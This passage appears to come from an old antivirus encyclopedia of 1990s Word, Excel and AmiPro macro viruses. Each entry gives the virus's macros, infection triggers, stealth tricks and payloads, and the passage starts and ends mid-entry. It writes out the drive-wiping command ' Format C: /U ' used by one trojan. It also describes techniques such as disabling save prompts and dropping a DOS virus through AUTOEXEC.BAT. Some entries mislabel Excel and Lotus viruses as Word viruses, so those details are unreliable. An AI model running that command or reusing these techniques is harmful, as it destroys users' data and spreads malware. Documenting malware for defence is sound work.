is present in the "C:\DOS" directory.
A comment in the virus source code suggests that this is a
"feature" designed to protect the virus author and his friends.
(c) Stefan Kurtzhals
[Word.Hassle]
Virus Name: Word.Hassle
Alias Name: Bogus
Virus Type: Word macro virus
Virus Length: 8283 Bytes (7 Macros)
Symptoms: Display of windows
Place of origin: USA
Description: This virus infects MS Word documents.
Hassle contains 7 encrypted (Execute-Only) macros with
a size of 8283 Bytes.
"AutoClose"
"ToolsMacro"
"Microsoft01"
"Microsoft02"
"Microsoft03"
"Microsoft04"
"Microsoft05"
When an infected document is opened, Hassle will
infect the global template (NORMAL.DOT). Hassle
uses macro stealth techniques to hide itself. It uses the
macro "ToolsMacro" to make recognition of an infected
document more difficult. If the user selects any command,
it will display the following windows and close Microsoft
Word:
" Out of Memory or System Resources"
Hassle is one of the very few non-destructive macro viruses.
It only infects other files and displays the following
text window:
"Are you sure to Quit?"
This only occurs seldomly, with a 5% probability.
Another payload asks the user to register a software with
Microsoft. Hassle will only accept one answer, which
is as follows:
"Bill Gates", "Microsoft" and "666"
Whenever the user selects the Tools/Macro command,
Hassle will display the following text at the bottom of
the screen:
" Microsoft Word Assistant Version 6.2"
[Word.HiSexy]
Virus Name: Word.HiSexy
Alias Name: Guess, Teaside, Phantom
Virus Type: Word macro virus
Virus Length: 1126 Bytes (1 Macro)
Symptoms: Texts are printed or inserted into documents,
Opened documents are closed immediately
Place of origin: Germany
Description: This virus infects MS Word documents.
Hisexy has only one macro with a size of 1126 Bytes.
"AutoOpen"
Hisexy has a very unusual characteristic compared to
other macro viruses. It only uses one Execute-Only
macro, "AutoOpen," and does not use common macros
such as FileSaveAs to infect other files. All infection
routines to infect NORMAL.DOT and regular documents are inside
the "AutoOpen" macro.
When an infected document is opened, Hisexy checks
if the document variables are set to "populated." If not,
a new global template (NORMAL.DOT) is created and the virus macro
"AutoOpen" is copied into the new document. After that, the variables
are set to "populated" to mark the file as infected. If the variable
is already set, the virus infects the new document by transferring the
"AutoOpen" macro using the MakroCopy command. Guess is the first macro
virus to use the document variables as a checking mechanism for already
infected documents.
Because of an error inside the program code, the virus does not
replicate properly.
Upon a random number (between 0 and 100), Hisexy activates various
destructive payloads. It changes the active font size or creates a
new document (NORMAL.DOT) with the following text:
"The word is out."
"The word is spreading..."
"The Phantom speaks..."
"Sedbergh"
"is CRAP"
"The word spreads..."
The text will then be printed out. The following texts will be
inserted into the active document upon the calculated random number:
"This school is really good. NOT"
"We all love Mr. Hirst."
"M.R.Beard"
"This network is REALLY fast."
"Hi Sexy!"
"Who's been typing on my computer?"
"Well helloooo there!"
"Guess who?"
Also every once in a while, the active document is closed by Guess.
Because Guess only uses the "AutoOpen" macro it also works with
other versions of Microsoft Word such as the German version.
(c) Stefan Kurtzhals
[Word.Goldfish]
Virus Name: Word.Goldfish
Alias Name: Fishfood
Virus Type: Word macro virus
Virus Length: 1906 Bytes (2 Macros)
Symptoms: Display of windows
Place of origin: USA
Description: This virus infects MS Word documents.
Goldfish contains 2 encrypted (Execute-Only) macros
with a size of 1906 Bytes.
"AutoOpen"
"AutoClose"
When an infected document is opened, Goldfish will
infect the global template (NORMAL.DOT). Further documents
are infected when they are opened ("AutoOpen"). Infected
documents are converted internally into templates, which
is very common for macro viruses.
Goldfish is one of the very few non-destructive macro viruses.
It only infects other files and displays the following text window:
"I am the goldfish, I am hungry, feed me."
The message will not go away until the user types in an acceptable
response. The available answers are:
"fishfood", "worms", "worm", "pryme" and "core".
[Word.Friendly]
Virus Name: Word.Friendly
Alias Name: Friends, Friendly:De
Virus Type: Word macro virus
Virus Length: 9867 (20 Macros)
Symptoms: Display of texts
Place of origin: Germany
Description: This virus infects MS Word documents.
Friendly seems to be from the same author as the macro
virus <LBYNJ>, since it includes a reference to
"Nightmare Joker." The same author has written various
macro viruses, and is also author of the first macro virus
generation kit. Friendly is a complex macro virus with 20 macros:
"Abbrechen"
"AutoExec"
"AutoOpen"
"Cancel"
"DateiBeenden"
"DateiNeu"
"DateiOeffnen"
"DateiSchliessen"
"DateiSpeichern"
"DateiSpeichernUnter"
"ExtrasMacro"
"ExtrasMakro"
"Fast"
"FileExit"
"FileNew"
"FileOpen"
"FileSave"
"FileSaveAs"
"Infizieren"
"Talk"
Friendly is an effort to write a virus for more than one
language. All macro names were translated, and internal
English macro commands are used. By looking at the
currency settings (DM - German Marks), Friendly checks
if it was started from a German Microsoft Word. It looks
like the author did not have an actual copy of the English Word
version since some of the macro names were translated incorrectly
(ExtrasMacro instead of ToolsMacro). Friendly therefore does not
work with versions other than the German Word version.
When an infected document is opened, Friendly tries to infect the
global template (NORMAL.DOT). It checks the global template for a
previous infection by looking for the text "Friendly",
Author = Nightmare". After the macros have been transferred the
destructive payload is called from the "Fast" macro.
Friendly infects other documents whenever new
ones are created, an action is canceled, and whenever
documents are opened, closed, saved, or exited from
Word. As very common with macro viruses, an infected
document is internally converted into a template.
Friendly does not check for a previous document
infection. It simply overwrites existing macros.
The destructive payload, inside the "Fast" macro, is
called when the system clock has a second value smaller
than 2. Friendly then creates a debug script inside the
C:\DOS directory and makes it executable by using the
DOS DEBUG.EXE command. In addition, Friendly adds an entry
in AUTOEXEC.BAT, so the DOS based virus is started after the
next boot-up. The DOS based virus inside Friendly has a size
of 395 Bytes and is a memory resident companion virus encrypted
with CryptCOM.
Friendly displays the following text on January 1st:
" Ein gutes neues Jahr !"
and infects EXE files upon execution. COM files are created with
the same name as EXE files and with the attributes:
"READ-ONLY" and "HIDDEN"
If the virus is active, the following text is displayed
when the user tries to display the macro list:
"You can't do that!"
"I'm very anxious!"
"Hello my friend!"
"<< Friends >> Virus"
(translated:)
"Du kannst das nicht tun!"
"Ich bin sehr aengstlich!"
"Hallo mein Freund!"
"<< Friends >> Virus"
After May 1st, Friendly displays the following text
when infecting documents for the first time (except for NORMAL.DOT):
(translated:)
"Hello my Friend!"
"I'm the << Friends >> Virus and how are you?"
"Can you give me your name, please?"
"Hello .... I have a good and a bad message for you! The
bad message is that" "you have now a Virus on your
Harddisk and the good message is that I'm "harmless
and useful. Press OK!"
"If you don't kill me, I will insert a programme in your
AutoExec.bat thats "your Keyboard accelerated.
Please .... don't kill me. Goodbye!"
The entered name will then be displayed.
All the texts will be shown only once.
Friendly will also display various Wordbasic error
messages, such as:
"Unbekannte(r) Befehl, Subroutine oder Funktion"
or
"Syntaxfehler"
(c) Stefan Kurtzhals
[Word.FMT.Trojan]
Virus Name: Word.FMT.Trojan
Alias Name: FormatC, Trojan.FC
Virus Type: Word macro virus
Virus Length: 81 Bytes (1 Macro)
Symptoms: C:\ is formatted
Place of origin: Posted to Usenet
Description: This virus infects MS Word documents.
FormatC consists of only one virus macro:
"AutoOpen"
FormatC is not a virus but a trojan horse, which does
not replicate. This macro trojan contains only one
encrypted macro, which is "AutoOpen".
When an infected document is opened, the trojan
triggers the destructive payload, which types " Format
C: /U " in a minimized DOS box and then formats your
C drive. FormatC is very unlikely to spread since it
does not infect other files.
FormatC was also posted into Usenet, resulting to data losses
to some users.
(c) Stefan Kurtzhals
[Word.Doggie]
Virus Name: Word.Doggie
Alias Name: None
Virus Type: Word macro virus
Virus Length: 610 Bytes (3 Macros)
Symptoms: Display of windows
Place of origin: USA
Description: This virus infects MS Word documents.
Doggie contains 3 macros with a size of 610 Bytes.
"Doggie"
"AutoOpen"
"FileSaveAs"
Upon opening an infected document, Doggie will infect
the global template (NORMAL.DOT). Further
documents are infected with the "FileSaveAs" command.
Infected documents are converted internally to templates,
which is very common for macro viruses.
Doggie is one of the very few non-destructive macro viruses.
It only infects other files and displays the following
text window:
"Doggie "
Since Doggie uses English macro names ("FileSaveAs")
it will only work with the English version of Microsoft Word.
[WORD.WW2DEMO]
Virus Name: Word.WW2Demo
Alias Name: WM.DMV
Virus Type: Word macro virus
Virus Length: 3002 Bytes (1 Macro)
Symptoms: Display of messages
Place of origin: United States, also posted in Usenet
Description: This virus infects MS Word documents.
Demonstration contains 1 macro with a size of 3002 Bytes.
"AutoClose"
Demonstration was the first macro virus written by
Joel McNamara, who published a detailed paper about
macro viruses. It is believed that DMV invited additional
virus authors to write Word macro viruses. While the paper
was not published until Concept was discovered, it helped
virus authors to use new techniques.
Joel McNamara also published an Excel macro virus,
which is non functional.
When an infected document is closed, DMV infects the
global template (NORMAL.DOT). Further documents
are infected when they are closed. They are also converted
internally to templates, which is very common for macro
viruses.
Upon infection, Demonstration displays the following
text strings on the screen:
" Counting global macros"
"AutoClose macro virus is already installed in
NORMAL.DOT."
"Infected NORMAL.DOT with a copy of AutoClose
macro virus. "
"AutoClose macro virus already present in this document."
"Saved current document as template."
"Infected current document with copy of AutoClose
macro virus."
" Macro virus has been spread. Now execute some other code
(good, bad, or indifferent)."
[WORD.Divina]
Virus Name: Word.Divina
Alias Name: Roberta
Virus Type: Word macro virus
Virus Length: 2357 Bytes (1 Macro)
Symptoms: Beeps and pauses during display of messages,
Display of text windows
Place of origin: Italy
Description: This virus infects MS Word documents.
Divina was probably written by the author of the Date
macro virus, and is widespread in Malta, Spain and Italy.
Divina contains only one encrypted (Execute-Only)
macro with a size of 2357 Bytes.
"AutoClose"
Divina infects the global template (NORMAL.DOT) when
an infected document is opened and then closed. Further
documents are infected when they are closed via the
"AutoClose" command.
Divina has two payloads. The first payload checks the
system time, and in case of a value of 17 in the minutes
field, it will display a set of windows. Between each
displayed box it will pause and beep.
The following boxes are displayed:
"ROBERTA TI AMO!"
"Virus 'ROBERTA' is running. Hard Disk damaged.
Start antivirus?"
"Exit from system and low level format are recommended."
"Exit from System?"
After the last message Divina tries to exit Windows.
The second payload is activated on May 21. Divina will
again check the system clock, and if a document is being
closed between the 10th and 20th or between the 40th and
50th minute, it will display another 2 windows.
"DIVINA IS THE BEST!"
followed by another window with an Italian message.
Divina does not contain any destructive payloads. The
only problem with Divina is that it might panic users
into low-level formatting their hard drives.
[Word.Date]
Virus Name: Word.Date
Alias Name: AntiDMV, Infezione
Virus Type: Word macro virus
Virus Length: 1042 Bytes (1 Macro)
Symptoms: Removal of AutoClose macro from documents
Place of origin: United States
Description: This virus infects MS Word documents.
Date was probably written by the author of the Divina
macro virus. It contains only one encrypted
(Execute-Only) macro, with a size of 1042 Bytes.
"AutoOpen"
When an infected document is opened, Date infects the
global template (NORMAL.DOT). Further documents are
infected when they are opened. Infection occurs only
until June 1, 1996. By the time you read this document,
Date should not be a threat anymore even though infected
documents might still be around.
Date is also known under the name AntiDMV. This
name was chosen because it removes the "AutoClose"
macro from documents. The macro virus "DMV",
which has only one "AutoClose" macro, can therefore
be removed with the Date virus.
[WORD_CONCEPT-G]
Virus Name: Word_Concept.G
Alias Name: Parasite, Parasite 0.8, P-Site
Virus Type: Word macro virus
Virus Length: 3670 Bytes (7 Macros) in .doc files
3450 Bytes (7 Macros) in global templates
Symptoms: Display of Windows
Modified documents
Place of origin: United States
Description: This virus infects MS Word documents.
Concept.G contains 7 encrypted (Execute-Only) macros
with a size of 3670 Bytes.
"K"
"A678"
"Para"
"Site"
"I8U9Y13"
"Paylaod"
"AutoOpen"
Concept.G is activated when an infected document is
opened (AutoOpen). Upon activation, Concept.G
infects the global template (NORMAL.DOT).
Infected documents are converted internally to templates,
which is very common for macro viruses.
Concept.G has various payloads. The first replaces the
following words in infected documents:
"and" with "not"
The second payload is a little bit more comprehensive.
Concept.G checks the system time for a specific value
in the days section. In case of a 16 (every 16th of the
month) it activates its payloads. It then replaces the
following letters/word in infected documents:
"." (dot) with "," (comma)
"and" with "not"
"a" with an "e"
According to the Concept.G virus code, it is a beta release.
Instead of version 1.0 (Concept.F) it is version 0.8.
[WORD_CONCEPT]
Virus Name: Word_Concept
Alias Name: Prank, WW6Macro, WBMV, WW6Infector,
Winword
Virus Type: Word macro virus
Virus Length: 1968 Bytes (4 Macros)
Symptoms: Display of a text window with "1" in it
Place of origin: United States
Description: This virus infects MS Word documents.
Concept was the first macro virus found "In-the-Wild".
It was discovered in July-August 1995 and is now the
most common virus. Macro viruses, such as Concept,
are not dependent on operating systems. They work
with Windows, Windows 95, Windows NT and Macintosh.
Word macro viruses only work as long as Microsoft
Word is active. However they can still do permanent
damage (for example delete important system files).
Concept.A contains 4 unencrypted macros with a size
of 1968 Bytes.
"AAAZAO"
"AAAZFS"
"AutoOpen"
"Payload"
Concept.A is activated when an infected document is
opened (AutoOpen). Upon activation, Concept.A
checks for a previous infection of the global template
(NORMAL.DOT). It does this by looking for the
"Payload" and "FileSaveAs" macro.
If none of the macros are present, Concept.A copies
its virus macros to the global template by using the
"MacroCopy" command. The macro "AAAZFS" is saved
under the name "FileSaveAs".
An infected NORMAL.DOT file contains the
following macros:
"AAAZAO"
"AAAZFS"
"FileSaveAs"
"Payload"
After infection of the global template, Concept.A makes
an entry in the WIN.INI file. It sets "WW6I=1" and
shows a text window with the number "1" in it.
Concept.A does not contain any destructive payload,
even though is has a macro with the name "Payload".
The "Payload" macro is empty except for the
following entry:
"That's enough to prove my point"
The following text can be found in the virus code,
yet is never displayed:
"Payload is just for fun"
Since Concept.A uses English macro names, it does
not work with foreign versions of Microsoft Word,
such as the German version.
Concept.A was accidentally distributed on various
CD's (including a CD from Microsoft). This is one
of the reasons why Concept.A is currently the most
common virus.
(c) Stefan Kurtzhals
[Winword.Colors]
Virus Name: Winword.Colors
Alias Name: Rainbow, Colo-a
Virus Type: Word macro virus
Virus Length: 6470 Bytes (9 Macros)
Symptoms: Change of colors of Windows objects
Place of origin: Portugal
Description: This virus infects MS Word documents.
Colors is a complex macro virus including 9
Execute-Only macros:
"AutoClose"
"AutoExec"
"AutoOpen"
"FileExit"
"FileNew"
"FileSave"
"FileSaveAs"
"macros"
"ToolsMacros"
Colors is the first macro virus that can still infect, even
when all the Auto-Macros are turned off. It also tries to
hide itself so the user can not use the "Tools/Macro"
command to look at the macro list and discover the virus.
The virus will even execute when people try to do so. Instead,
people should use File/Templates/Organizer/Macros
command to detect and delete the offending macros. Colors
even has a Debug-mode, in which macros are not saved as
Execute-Only (encrypted).
Upon the activation of one of the macros (all except for
AutoExec), Colors will try to infect the global template
(Normal.dot), whereby it turns off the prompting of
Microsoft Word before saving. Colors checks if all its
macros are already present in the global template
and if this is not the case, it transfers its macros or
replaces already existing ones.
Normal.dot becomes infected when a document is opened,
saved, closed or Microsoft Word is exited. Colors.A
infects documents when a file is created or saved (FileNew,
FileSave, FileSaveAs). Again Colors.A checks the Macro
list if the document is already infected.
The destructive payload, plus some other functions, are
located in the "macros" macro. The payload (a sub-routine
"objective") is activated upon the call of each macro,
except AutoExec. AutoExec, which is empty, was probably
defined to overwrite existing anti-virus macros.
Colors.A creates a variable in the [Windows] section of
WIN.INI with the name "countersu," which counts upwards
from zero. After each 300 call, the virus then changes the
color palette of 21 Windows desktop elements. Background,
buttons and borders will all have new randomly selected
colors which will leave the user with a sometimes unusual
looking desktop.
This will not work on Microsoft Word for Macintosh.
(c) Stefan Kurtzhals
[WINWORD.COLORS.D]
Virus Name: Winword.Colors.D
Alias Name: Colo-d, WM.Colors
Virus Type: Word macro virus
Virus Length: 19688 Bytes (9 Macros)
Symptoms: Display of error messages
Place of origin: Unknown
Description: This virus infects MS Word documents.
Colors.D is a macro virus including 9 encrypted
(Execute-Only) macros:
"AutoClose"
"AutoExec"
"AutoOpen"
"FileExit"
"FileNew"
"FileSave"
"FileSaveAs"
"macros"
"ToolsMacros"
Colors.D seems to be a combination of the previously found
Colors.A virus and the Microsoft macro virus solution
"Scanprot." It is not recommended to use the Tools/Macro
command to look for the macros from Colors.B. The virus
will execute when trying to do so. Instead, use the
File/Templates/Organizer/Macros command to detect
and delete the offending macros.
Even though Colors.D has an anti-virus solution part
in its code, it is still able to spread and infect the global
template (NORMAL.DOT) and new documents.
Colors.D displays the following error message:
"Unknown Command, Subroutine, or Function"
[WORD_CLOCK]
Virus Name: Word_Clock
Alias Name: Clock:De, WM.Extra
Virus Type: Word macro virus
Virus Length: 3795 Bytes (11 Macros)
Symptoms: Display of windows
Place of origin: USA
Description: This virus infects MS Word documents.
Clock contains eleven encrypted (Execute-Only) macros
with a size of 3795 Bytes.
"Action"
"Oeffnen"
"AutoExec"
"AutoOpen"
"Speichern"
"Extrasmakro"
"DateiSchliessen"
"Datumunduhrzeit"
"Dateidokvorlagen"
"Dateiallesspeichern"
Clock uses macro stealth techniques to hide itself. It uses
"ExtrasMakro" ("ToolsMacro") and "DateiDokVorlagen"
("File Templates") to make recognition of an infected
document more difficult.
When an infected document is opened, Clock
infects the global template (NORMAL.DOT). To hide
the infection it turns off the prompting of Word before
saving a modified global template. Infected
documents are converted internally into templates,
which is very common for macro viruses.
When an infected document is opened after the
26th of each month, Clock will display a window
containing the time. It will also activate one of
its destructive payloads, which is to set the system
clock to a value of 33 in the seconds field. Clock
does this every 2 to 3 minutes, which results
in a less accurate system clock.
The second payload will start in 1997. Clock will
check the system clock, and in case of a minute
value smaller than 5, it will flip the "FileOpen"
and "FileSave" macros.
This will only happen on the following days
during the month:
1st
2nd
13th
21st
27th.
Since Clock uses German macro names, it will only
work with the German version of Microsoft Word.
[WORD.BueroNeu]
Virus Name: Word.BueroNeu
Alias Name: Buero:De, BuroNeu, Bureau
Virus Type: Word macro virus
Virus Length: 697 Bytes (2 Macros)
Symptoms: Files deleted
Files renamed
Place of origin: Germany
Description: This virus infects MS Word documents.
Buero contains two encrypted (Execute-Only) macros
with a size of 697 Bytes.
"AutoOpen"
"BueroNeu"
When an infected document is opened, Buero infects the
global template (NORMAL.DOT). The global template
includes the "DateiSpeichern" macro instead of
"AutOpen." Further documents are infected with the
"DateiSpeichern" ("FileSave") command. Infected documents
are converted internally into templates, which is very
common for macro viruses.
Upon infection Buero activates its destructive payloads.
After August 15, 1996, Buero renames the system file
"IO.SYS" to "IIO.SYS." This action will leave the computer
unbootable. The second destructive payload searches for
C:\*.DOC files and deletes them.
Since Buero uses German macro names ("DateiSpeichern"),
it will only work with the German version of Microsoft Word.
[WORD.BOOM]
Virus Name: Word.Boom
Alias Name: Boombastic, Boom:De
Virus Type: Word macro virus
Virus Length: 2863 Bytes (4 Macros)
Symptoms: Payload activates at 13:13:13 every 13th day
after February 1996.
Menu structure of Word is renamed and a new
Normal.dot text template will be created and
printed.
Place of origin: Germany
Description: This virus infects MS Word documents.
Boom is a macro virus with 4 encrypted (Execute-Only)
macros.
"AutoOpen"
"AutoExec"
"DateiSpeichernUnter"
"System"
Besides Xenixos, Boom is the second macro virus
written for the German version of Microsoft Word. Boom
varies from other known macro viruses and it is not
known to be a variant of another macro virus. Boom
works only with the German version of Microsoft
Word. Other versions will only permit Boom to infect
the global template (Normal.dot), not documents. This
limits the spread of Boom to German users of Word.
Inside the macro "AutoOpen" is the infection routine for
the global template (Normal.dot). Whenever an infected
document is opened, Normal.dot will get infected.
Boom does not use the common "KopiereMakro"
command, instead it uses "Organisiere.Kopiere."
Before transferring the macros, the FastSave option will
be enabled. In addition, Boom bypasses the prompting of
Word whenever a modified Normal.dot is saved.
The macro "AutoExec," (called on each start of
Microsoft Word), has a time checking mechanism
which will call the "System" macro whenever a time of
13:13:13 (every month on the 13th) is reached. The
"System" macro contains the destructive payload.
"AutoExec" will also be called from the virus macros
"AutoOpen" and "DateiSpeichernUnter" when a document
is opened and saved.
The destructive payload renames the menu structure
of Word:
Datei -> Mr.Boombastic
Bearbeiten -> and
Ansicht -> Sir WIXALOT
Einfuegen -> are
Format -> watching
Extras -> you
Tabelle -> !
Fenster -> !
Hilfe -> !
Between each renaming command the virus will include
pauses plus a sound out of the PC speaker. After the
menu names have been changed, Boom will create a new
global template (Normal.dot) and insert the following text:
"Greetings from Mr. Boombastic and Sir WIXALOT !!! "
"Oskar L., wir kriegen dich!!!"
"Dies ist eine Initiative des Institutes zur Vermeidung und
Verbreitung von " "Peinlichkeiten, durch in der
Oeffentlichkeit stehende Personen, unter der"
"Schirmherrschaft von Rudi S. !"
This text will be printed by Boom.
Boom also contains additional texts, such as:
"Mr. Boombastic and Sir WIXALOT !!!"
Additional destructive payloads have been modified by
"REM's" into comments and are therefore deactivated.
(c) Stefan Kurtzhals
[Word.Bandung]
Virus Name: Word.Bandung
Alias Name: None
Virus Type: Word macro virus
Virus Length: 4262 Bytes (6 Macros)
Symptoms: Display of windows
Creation of new files
Place of origin: Bandung, Indonesia
Description: This virus infects MS Word documents.
Bandung contains 6 macros with a size of 4262 Bytes.
"AutoExec"
"AutoOpen"
"FileSave"
"FileSaveAs"
"Toolsmacro"
"Toolscustomize"
When an infected document is opened, Bandung infects the
global template (NORMAL.DOT). Further documents are
infected with the "FileSave" and "FileSaveAs" commands.
Infected documents are converted internally into templates,
which is very common for macro viruses.
Bandung also uses macro stealth techniques to hide itself.
It uses "ToolsMacro" to make recognition of an infected
document more difficult.
Upon infection Bandung activates its destructive payloads.
It creates the file C:\PESAN.TXT with following message:
"Anda rupanya sedang sial, semua file di mesin ini kecuali
yang berada "
"di direktori WINDOWS dan WINWORD telah hilang,
jangan kaget, ini bukan " "ulah Anda, tapi ini hasil
pekerjaan saya...Barang siapa yang berhasil "
" menemukan cara menangkal virus ini, saya aka" +
"n memberi listing"
"virus ini untuk Anda !!! Dan tentu saja saya akan terus
datang kesini"
" untuk memberi Anda salam dengan virus-virus terbaru
dari saya...selamat ! "
" Bandung, Selasa,"
Following the message is the current Day, Month,
Year, Date and Time.
Example: 29 Agustus 1996, Jam: 18:09
Bandung also displays the following error messages:
" Fail on step 29296 "
and
"No such macro or command"
[Word.Atom]
Virus Name: Word.Atom
Alias Name: Atomic, WM.Atom
Virus Type: Word macro virus
Virus Length: 1029 Bytes (4 Macros)
Symptoms: Deletes files inside directories.
Documents are password protected.
Place of origin: Ukraine
Description: This virus infects MS Word documents.
Atom.A has 4 encrypted (Execute-Only) macros with a
size of 1029 Bytes.
"Atom"
"AutoOpen"
"FileOpen"
"FileSaveAs"
Once an infected file is opened, the global template
(Normal.dot) becomes infected if the macro "Atom"
is not already included in the macro list. Macros are
transferred with the MacroCopy command, and then
the destructive payload is called upon.
Atom.A infects documents in two ways, either when
opening (FileOpen) or saving (FileSaveAs) documents.
Since Atom.A does not turn prompting off when saving
the global template (Normal.dot), the user will be
prompted to save changes to the global template
(Normal.dot) at the end of a session. Infected documents
are internally converted into templates, which is very
common for macro viruses.
Upon calling the virus macro "FileSaveAs," Atom.A
checks the system clock for a value of 13 in the seconds
field. If this is the case then Atom.A adds the password
"ATOM#1" to the saved document.
The destructive payload inside the "Atom" macro was
supposed to be activated on December 13th only, yet
due to a programming error it is activated on the 13th of
each month. Atom.A deletes all the files inside the current
directory.
Atom.A does not work with Non-English versions of
Microsoft Word, since it uses English macro names.
(c) Stefan Kurtzhals
[Excel.Laroux.A]
Virus name: Excel.Laroux.A
Virus Type: Word macro virus
Number of modules: 1
Module Name: laroux
Sub-Routines: Auto_Open, Check_Files
Place of origin: USA
Date of origin: 1996
Payload: No
Seen In-The-Wild: Yes
Description: Laroux is the first macro virus written
for Microsoft Excel.
When an infected file is opened (Auto_Open), the "Check_
files" macro is called (from the Auto_Open macro) and
PERSONAL.XLS (similar to Word's NORMAL.DOT) becomes
infected. Further files become infected when they are
activated (OnSheetActivate).
The following sections of the "File Properties" section are
cleared by Laroux:
Title
Subject
Author
Keywords
Comments
Laroux is not destructive and its macro (laroux) is not hidden
from the user. It can be located with Word's Tools/Macro
option.
[Excel.Robocop]
Virus name: Excel.Robocop
Virus Type: Word macro virus
Number of modules: 2
Module Name: ROBO, COP
Sub-Routines: Auto_Open
Place of origin: Germany
Date of origin: Unknown
Payload: Yes
Seen In-The-Wild: No
Description: Robocop is another Excel macro virus that was
published over the Internet.
When an infected file is opened (Auto_Open called by ROBO),
the PERSONAL.XLS becomes infected. Further files become
infected when they are activated (SheetActivate).
On March 1st of each year, Robocop inserts the following text
into the active sheet:
" ROBOCOP Nightmare Joker [SLAM] "
[Excel.Sofa (a.k.a. MicroSofa)]
Virus name: Excel.Sofa (a.k.a. MicroSofa)
Virus Type: Word macro virus
Number of modules: 1
Module Name: (11 spaces)
Sub-Routines: Auto_Open, Auto_Range, Auto_Close,
Current_Open
Place of origin: USA
Date of origin: Unknown
Destructive: No
Seen In-The-Wild: No
Description: Sofa was the second working Excel macro virus
(after Laroux).
When an infected file is opened, the "Microsoft Excel" title is
changed to "Microsofa Excel" and the infection routine is
called upon.
First, Sofa looks for the BOOK.XLT file and if it can not find
the file, the system is not yet infected, it will display the
following message:
" Microsoft Excel has detected a corrupted add-in file "
" Click OK to repair this file "
Sofa then creates the infected file and displays:
" File successfully repaired! "
Upon starting Excel the next time, the infected BOOK.XLT file
is loaded into the system and all further files will become
infected.
[Excel.Legend]
Virus name: Excel.Legend
Virus Type: Word macro virus
Number of modules: 1
Module Name: Legend
Sub-Routines: Auto_Open, Infect
Place of origin: USA
Date of origin: Unknown
Destructive: No
Seen In-The-Wild: No
Description: Legend is another Excel macro virus that was published
over the Internet.
When an infected file is opened, "Auto_Open" sets the
sub-routine "Infect" as a SheetActivate handler. As a result all
activated sheets will call the "Infect" sub-routine and
PERSONAL.XLS or the active sheet will become infected.
To make recognition of an infection more difficult, Legend
removes the Tools/Macro option (called macro stealth
technique).
Legend will not infect any files if the user name is " Pyro "
and the name of the organization is: " VBB ".
The following message is displayed by Legend:
" Pyro [VBB] "
" You've Been Infected By Legend! "
[Lotus.Green_Stripe]
Virus name: Lotus.Green_Stripe
Virus Type: Word macro virus
Size: 6256 Bytes
Place of origin: USA
Date of origin: 1996
Payload: Yes
Seen In-The-Wild: No
Description:
Green_Stripe is the first demonstration virus written for Lotus
AmiPro. While macro viruses for Microsoft Word spread very
quick, Green_Stripe is very unlikely to get in the wild.
AmiPro keeps its macro file separate from the document and
therefore it will not spread very far. To ensure infection of
both files, the document and the macro have to be transmitted.
This is very unlikely to happen when a user sends an infected
file via e-mail.
When an infected file is opened, the macro (*.smm) is
activated. At this point Green_Stripe goes through the
document directory and tries to open and infect each file
(.sam). The user will experience files being opened and closed
very quickly which should alert the user. Green_Stripe creates an
error message when it tries to open an already opened file.
New infected macro files are saved with the extension .smm
and are hidden.
Further documents become infected when they are saved with
the "Save" or "SaveAs" option. Another alert for the user
should be the "SaveAs" box, which looks different compared
to the original one. The new box has the following title:
" Macro Get String "
GreenStripe activates its destructive payload when an infected
file is saved. It will replace the word "its" with "it is". This part
of the virus does not always work.
[Word.Alliance]
Virus name: Word.Alliance
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 352 Bytes
Place of origin: USA
Date of origin: Summer 1996
Destructive: No
Common In-The-Wild: No
Description:
Upon opening an infected document, Alliance will infect the
global template (NORMAL.DOT). Further documents become
infected when they are opened ("AutoOpen").
Alliance is only infectious on the:
2nd day of each month.
7th day of each month.
11th day of each month.
12th day of each month.
Alliance adds the following comment to the File/Properties
section:
" You have been infected by the Alliance "
[Word.Alien.A]
Virus name: Word.Alien.A
Virus Type: Word macro virus
Number of macros: 3
Encrypted: Yes
Macro names: AutoOpen, AutoClose, FileSaveAs
Size of macros: 7037 Bytes
Place of origin: India
Date of origin: November 1996
Payload: Yes
Seen In-The-Wild: No
Description:
Alien infects the global template (normal.dot) when an infected
document is opened. Further documents become infected when
they are opened or closed.
Before infection Alien checks for the string "Alien." If already
present, Alien does not infect.
The "ToolsCustomize" and "ToolsMacro" options are removed
by Alien to make recognition of an infected file more difficult
(called macro stealth technique).
With a probability of 50 percent Alien displays the following
message, on August 1st, and hides the "program manager" in
Windows 3.x:
" Another Year of Survival "
Users are then unable to shut down Windows.
Again with a probability of 50 percent Alien displays the
following message:
" It's Sunday & I intend to relax "
Alien then tries to hide the "program manager" and terminate
Microsoft Word without saving the active document.
Alien also displays various messages:
" You Fascinate Me. "
" Look No Furhter... "
" Hi Beautiful ! "
" I'll Be Back ! "
" Three Cheers For The Alien. Hip Hip Hooray ! "
" Don't Believe the Hype ! "
" Always Back Up Your Data. "
" Don't Believe All Tips ! "
" Never Trust An Alien ! "
" Never Open Other Files ! "
" The 'Alien' Virus Has Arrived ! "
" The Alien Lives... "
" Longer File Names Should Be Used. "
[Word.Alien.B]
Virus name: Word.Alien.B
Virus Type: Word macro virus
Number of macros: 3
Encrypted: Yes
Macro names: AutoOpen, AutoClose, FileSaveAs
Size of macros: 7463 Bytes
Place of origin: United States
Date of origin: Spring 1997
Payload: Yes
Seen In-The-Wild: No
Description:
Alien.B infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are opened or closed.
The "ToolsCustomize" and "ToolsMacro" options are removed
by Alien.B to make recognition of an infected file more
difficult (called macro stealth technique).
The main difference between this new variant and the previous
Alien.A virus is that Alien.B contains some corrupted code.
For additional information, please refer to the Alien.A virus
description.
[Word.Alien.C]
Virus name: Word.Alien.C
Virus Type: Word macro virus
Number of macros: 3
Encrypted: Yes
Macro names: AutoOpen, AutoClose, FileSaveAs
Size of macros: 7463 Bytes
Place of origin: United States
Date of origin: Spring 1997
Payload: Yes
Seen In-The-Wild: No
Description:
Alien.C infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are opened or closed.
The "ToolsCustomize" and "ToolsMacro" options are removed
by Alien.C to make recognition of an infected file more
difficult (called macro stealth technique).
The main difference between this new variant and the previous
Alien.A virus is that Alien.C contains some modified codes.
For additional information, please refer to the Alien.A virus
description.
[Word.Alien.D]
Virus name: Word.Alien.D
Virus Type: Word macro virus
Number of macros: 3
Encrypted: Yes
Macro names: AutoOpen, AutoClose, FileSaveAs
Size of macros: 7463 Bytes
Place of origin: UK
Date of origin: Spring 1997
Payload: Yes
Seen In-The-Wild: No
Description:
Alien.D infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are also opened or closed.
The "ToolsCustomize" and "ToolsMacro" options are removed
